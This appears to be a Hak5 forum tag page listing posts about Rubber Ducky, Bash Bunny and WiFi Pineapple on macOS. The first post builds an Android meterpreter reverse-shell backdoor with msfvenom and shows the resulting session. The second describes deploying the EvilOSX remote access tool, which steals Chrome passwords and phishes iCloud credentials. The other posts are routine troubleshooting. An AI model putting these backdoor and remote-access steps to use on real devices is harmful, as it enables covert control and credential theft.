Hak5 Forums

Showing results for tags 'osx'.



Found 8 results

  1. meterpreter stuck on OSX metasploit

    I just created a sample Android backdoor, called apkgue.apk. After I run it on my phone (Android) I am stuck at the next step: the meterpreter > doesn't show. Why? Any help for me? Thanks.

        msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk
        [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk

        No platform was selected, choosing Msf::Module::Platform::Android from the payload
        No Arch selected, selecting Arch: dalvik from the payload
        No encoder or badchars specified, outputting raw payload
        Payload size: 8809 bytes

        msf > use exploit/multi/handler
        msf exploit(handler) > set payload android/meterpreter/reverse_tcp
        payload => android/meterpreter/reverse_tcp
        msf exploit(handler) > set lhost 192.168.43.128
        lhost => 192.168.43.128
        msf exploit(handler) > set lport 3344
        lport => 3344
        msf exploit(handler) > show options

        Module options (exploit/multi/handler):

           Name  Current Setting  Required  Description
           ----  ---------------  --------  -----------

        Payload options (android/meterpreter/reverse_tcp):

           Name   Current Setting  Required  Description
           ----   ---------------  --------  -----------
           LHOST  192.168.43.128   yes       The listen address
           LPORT  3344             yes       The listen port

        Exploit target:

           Id  Name
           --  ----
           0   Wildcard Target

        msf exploit(handler) > exploit
        [*] Exploit running as background job 0.

        [*] Started reverse TCP handler on 192.168.43.128:3344
        msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1
        [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  2. [PAYLOAD] untitled_EVILOSX

    Please check git for the latest README/code: https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX

    untitled_EVILOSX

        +  ______       _  _   ____    _____ __   __
        + |  ____|     (_)| | / __ \  / ____|\ \ / /
        + | |__ __   __ _ | || |  | || (___   \ V /
        + |  __|\ \ / /| || || |  | | \___ \   > <
        + | |____\ V / | || || |__| | ____) | / . \
        + |______|\_/  |_||_| \____/ |_____/ /_/ \_\
        + untitled_ bash bunny edition / stekole

    Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems.
    Accessing a computer system or network without authorization or explicit permission is illegal.

    Features

      • Client reconnects automatically/persistence
      • ECM_ETHERNET and HID attack
      • Emulate a simple terminal instance.
      • Sockets are encrypted with CSR via OpenSSL.
      • No dependencies (pure python).
      • Retrieve Chrome passwords.
      • Retrieve iCloud contacts.
      • Attempt to get iCloud password via phishing.
      • Show local iOS backups.
      • Download and upload files.
      • Retrieve find my iphone devices.
      • Attempt to get root via local privilege escalation (<= 10.10.5).
      • Auto installer

    Configuration

    Server

    To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server.

        git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX
        ./Server

    and type your listening port (1337)

    Client

    Before you deploy your bash bunny, update your configuration in the EvilOSX.py file. At the bottom of the file you will see a server and port variable. Set these to your server IP and listening port.

        #########################
        SERVER_HOST = "10.99.99.16"
        SERVER_PORT = 1337
        #########################

    Usage

    Plug in your bash bunny and wait until the script has finished running. You should see the client connect to the server.

        [email protected]:~/git/EvilOSX# ./Server.py
          ______       _  _   ____    _____ __   __
         |  ____|     (_)| | / __ \  / ____|\ \ / /
         | |__ __   __ _ | || |  | || (___   \ V /
         |  __|\ \ / /| || || |  | | \___ \   > <
         | |____\ V / | || || |__| | ____) | / . \
         |______|\_/  |_||_| \____/ |_____/ /_/ \_\

        [?] Port to listen on: 1337
        [I] Type "help" to get a list of available commands.
        > help
        help             -  Show this help menu.
        status           -  Show debug information.
        clients          -  Show a list of clients.
        connect <ID>     -  Connect to the client.
        exit             -  Close the server and exit.
        > clients
        [I] 1 client(s) available:
            0 = client_hostname
        > connect 0
        [I] Connected to "client_hostname", ready to send commands.

    Some of the other features can be found in the help menu. I have not tried them all.

        help             -  Show this help menu.
        status           -  Show debug information.
        clients          -  Show a list of clients.
        connect <ID>     -  Connect to the client.
        get_info         -  Show basic information about the client.
        get_root         -  Attempt to get root via local privilege escalation.
        download <path>  -  Downloads the file to the local machine.
        upload <path>    -  Uploads the file to the remote machine.
        chrome_passwords -  Retrieve Chrome passwords.
        icloud_contacts  -  Retrieve iCloud contacts.
        icloud_phish     -  Attempt to get iCloud password via phishing.
        itunes_backups   -  Show the user's local iOS backups.
        find_my_iphone   -  Retrieve find my iphone devices.
        screenshot       -  Takes a screenshot of the client.
        kill_client      -  Brutally kill the client (removes the server).
        exit             -  Exits the session.
        Any other command will be executed on the connected client.

    Removal of Tool

    The python script gets added to the user's ~/Library/ directory, and a startup file is added to the ~/Library/LaunchAgents directory.

        rm -rf ~/Library/Containers/.EvilOSX/
        launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist

    Defence

    Disable the command-space shortcut key for Spotlight, or disable Spotlight altogether if not needed.

    Todo

    Issues

    I ran into a few issues with the "Build" of the python script. If the default one in this payload doesn't work, regenerate a new EvilOSX.py. Run ./BUILDER and enter the appropriate information. After, copy this to your switch payload.

    Thanks @Marten4n6

    [YOURMOM](Check my room)
  3. ° sign instead of >

    Hi guys, I'm new here and need a bit of help regarding special characters along with the de.properties language file. My Ducky code requires the > sign (greater than), however by using the -l de.properties parameter my Rubber Ducky always writes a degree sign ° instead of >. In the properties file there is the following entry, which should be fine:

        ASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT // 62 >

    On Windows this is working well, and that's why I'm thinking the properties file is correct. However, I need to get this to work on my Mac as well. Do you have any tips? Thanks, David
  4. Hi, My MacBook Pro cannot find my newly bought Nano in the wp6.sh script, can anyone pls tell me why? It just keeps searching (.........) and never shows that it finds the device. If I do the same on a Linux machine it works fine. I can easily log in to the web interface on http://172.16.42.1:1471

        Subsequent sessions may be quickly connected using saved settings.

        [C]onnect using saved settings
        [G]uided setup (recommended)
        [M]anual setup
        [A]dvanced IP settings
        [Q]uit

        Step 1 of 3: Select Default Gateway
        Default gateway reported as 192.168.0.1
        Use the above reported default gateway? [Y/n]? Y

        Step 2 of 3: Select Internet Interface
        Internet interface reported as en0
        Use the above reported Internet interface? [Y/n]? Y

        Step 3 of 3: Select WiFi Pineapple Interface
        Please connect the WiFi Pineapple to this computer.
        ...................................................
        ...................................................
  5. [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  6. I found a script for ducky that looked pretty cool, and also a thing I wanted to try. So I changed the details for what I needed. To test if it worked right (just if the text was right) I encoded it to open TextEdit instead of Terminal. Now I got my inject.bin and plugged in my ducky. It opens TextEdit and types it in, BUT... for some reason it changes all > to § and < to $, and it also changes ' to ’. I'm guessing it's because of the keyboard language, but I'm using a Danish keyboard and also encode it with Danish?? Sorry if bad English, and thx for any help and info given!
  7. Can't access Nano

    I can't even seem to connect to my new Nano, there is no response on http://172.16.42.1:1471

    I plug it in - it boots - blue light blinks - then goes solid ...

    My read of Ifconfig shows Nano is connected to en5 - but seems en5 has no IP address ???

    Ifconfig output is below - and screen show is attached ...

    I'm stuck !!! Any ideas ? Is there a way to Hard Reset ??

    -------------------------------------

        en5: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
            options=4<VLAN_MTU>
            ether 00:c0:ca:8f:b6:11
            inet6 fe80::2c0:caff:fe8f:b611%en5 prefixlen 64 scopeid 0xa
            nd6 options=1<PERFORMNUD>
            media: autoselect (100baseTX <full-duplex,flow-control>)
            status: active
        bridge100: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
            options=3<RXCSUM,TXCSUM>
            ether 9a:e0:d9:79:10:64
            inet 192.168.2.1 netmask 0xffffff00 broadcast 192.168.2.255
            inet6 fe80::98e0:d9ff:fe79:1064%bridge100 prefixlen 64 scopeid 0xb
            Configuration:
                id 0:0:0:0:0:0 priority 0 hellotime 0 fwddelay 0
                maxage 0 holdcnt 0 proto stp maxaddr 100 timeout 1200
                root id 0:0:0:0:0:0 priority 0 ifcost 0 port 0
                ipfilter disabled flags 0x2
            member: en5 flags=3<LEARNING,DISCOVER>
                ifmaxaddr 0 port 10 priority 0 path cost 0
            nd6 options=1<PERFORMNUD>
            media: autoselect
            status: active

    pineapple-setup-stuck.pdf
  8. ICS on macOS: There and back again

    Apple likes to hard code the subnet (192.168.2.1) that is used on its implementation of Internet Connection Sharing (ICS). I don't know why; best I can figure is that it somehow allows them to more reliably prevent the client network from accessing any resources on the host network. This is something that can be prevented on other ICS setups with a firewall rule.

    Which brings me to another point. Apple likes to change firewalls. Apple likes to change everything. They recently switched to PF and a lot of the guides online are from before this change.

    So we've established something here. Apple changes things. And we can't stop them from changing things. So what do we do?

    Accounting for Change

    One thing has remained consistent in their various iterations of ICS. They use the subnet 192.186.2.0/24. This gives us 1 constant, and if we've learned our lesson, we also know that it may not stay constant. So let me back up. *ahem* We have zero constants. But we can plan for this one constant changing. Apple needs this base principle (a subnet) on which to build its ICS implementation.

    Think of a single stream in the woods that recursively branches out into thousands. In order to catalog the various species in the stream, it would not be wise to visit and collect samples from every stream. This would be inefficient. It would better serve you, your time and your study to head to the one stream whence all others came. The source. This subnet is the one stream and any changes Apple makes will use it. And even if it changes it, it's still only one change we have to account for.

    Knowing this, we can start to look at this problem from another perspective. We can stop visiting individual streams and concede that our network must be in the 192.168.2.1/24 range.

    What does that mean for Pineapple users?

    It means you can't access the Pineapple on 172.16.42.1 anymore. Is this a bad thing? Meh. It's a thing. For sure. I'd posit it's even a good thing. If we leave our pineapples on the default network, we eliminate the guesswork needed for anyone hunting pineapple. Yes, those people exist. And the tools necessary to do so bank on the fact that you haven't changed your default settings. See here.

    Is there a simple solution?

    Just move the pineapple to a different network!

    How?

    Depending on the version of the Pineapple, you can use WiFi or Ethernet or Ethernet-over-USB to make the initial connection to the Pineapple over SSH on 172.16.42.1. Once you're in:

        # This one could be anything you want. It's what you'll use to connect after the reboot
        uci set network.lan.ipaddr='192.168.2.10'
        # This is where the Pineapple will get its Internet from.
        uci set network.lan.gateway='192.168.2.1'
        uci commit && reboot

    That's it. Once you've rebooted, you can access the web interface and SSH like you would at 172.16.42.1, but if you used my configuration settings from above, you can access it from 192.168.2.10.

    What if Apple changes the subnet?

    Then you only have two values to change.

    Be sure to actually turn on ICS from the Mac's System Preferences > Sharing Pane.